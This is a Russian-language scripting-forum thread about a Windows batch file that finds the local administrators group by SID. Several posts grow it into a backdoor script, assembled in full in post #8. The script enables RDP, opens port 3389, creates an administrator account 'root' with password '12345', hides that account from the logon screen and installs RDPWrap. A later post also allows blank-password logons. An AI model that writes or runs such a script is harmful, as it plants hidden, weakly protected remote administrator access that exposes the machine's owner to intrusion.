CMD/BAT - [решено] автоматически определять группу администраторов на любой системе

Iska · Отправлено: **20:29, 14-08-2017** | #2

Well-known security identifiers in Windows operating systems

Код:

@echo off
setlocal enableextensions enabledelayedexpansion

for /f "usebackq delims=" %%i in (
	`wmic.exe Group where "LocalAccount=TRUE AND SID = 'S-1-5-32-544'" get Name /value ^| find.exe /i "Name"`
) do set sAdminGroup%%i

if defined sAdminGroupName (
	echo [%sAdminGroupName%]
)

endlocal
exit /b 0

DetFedot · Отправлено: **20:45, 14-08-2017** | #3

А как его можно совместить с RDP

Код:

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
netsh advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow
net user root /add
net localgroup Administrator root /add
net user root 12345
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v root /t REG_DWORD /d 0 /f
"RDPWInst.exe" -i -o
"RDPWInst.exe" -w

Iska · Отправлено: **21:23, 14-08-2017** | #4

Код:

…
if defined sAdminGroupName (
	net.exe localgroup "%sAdminGroupName%" "root" /add
)
…

DetFedot · Отправлено: **22:25, 14-08-2017** | #5

Код:

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
netsh advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow
if defined sAdminGroupName ( net.exe localgroup "%sAdminGroupName%" "root" /add)
net localgroup Administrator root /add
net user root 12345
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v root /t REG_DWORD /d 0 /f
"RDPWInst.exe" -i -o
"RDPWInst.exe" -w

Примерно должно так получится

Iska · Отправлено: **22:30, 14-08-2017** | #6

Цитата DetFedot:

Примерно должно так получится »

Если это утверждение — то оно неверное. Если вопрос — то на выбор два ответа: «Не должно» и «Не так».

DetFedot · Отправлено: **22:33, 14-08-2017** | #7

А можете помочь как мне его луче поместить в код чтоб он работал

Iska · Отправлено: **23:13, 14-08-2017** | #8

Код:

@echo off
setlocal enableextensions enabledelayedexpansion

for /f "usebackq delims=" %%i in (
	`wmic.exe Group where "LocalAccount=TRUE AND SID = 'S-1-5-32-544'" get Name /value ^| find.exe /i "Name"`
) do set sAdminGroup%%i

reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f
reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp"    /t REG_DWORD /d 1 /f

netsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow

net.exe user "root" "12345" /add

if defined sAdminGroupName (
	net.exe localgroup "%sAdminGroupName%" "root" /add
)

reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "root" /t REG_DWORD /d 0 /f

"RDPWInst.exe" -i -o
"RDPWInst.exe" -w

endlocal
exit /b 0

DetFedot · Отправлено: **00:44, 15-08-2017** | #9

А может тогда помочь реализовать и другой RDP код

Код:

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa" /v limitblankpassworduse /t REG_DWORD /d 0 /f
netsh advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow
"RDPWInst.exe" -i -o
"RDPWInst.exe" -w

Iska · Отправлено: **01:07, 15-08-2017** | #10

DetFedot, поясните Вашу мысль.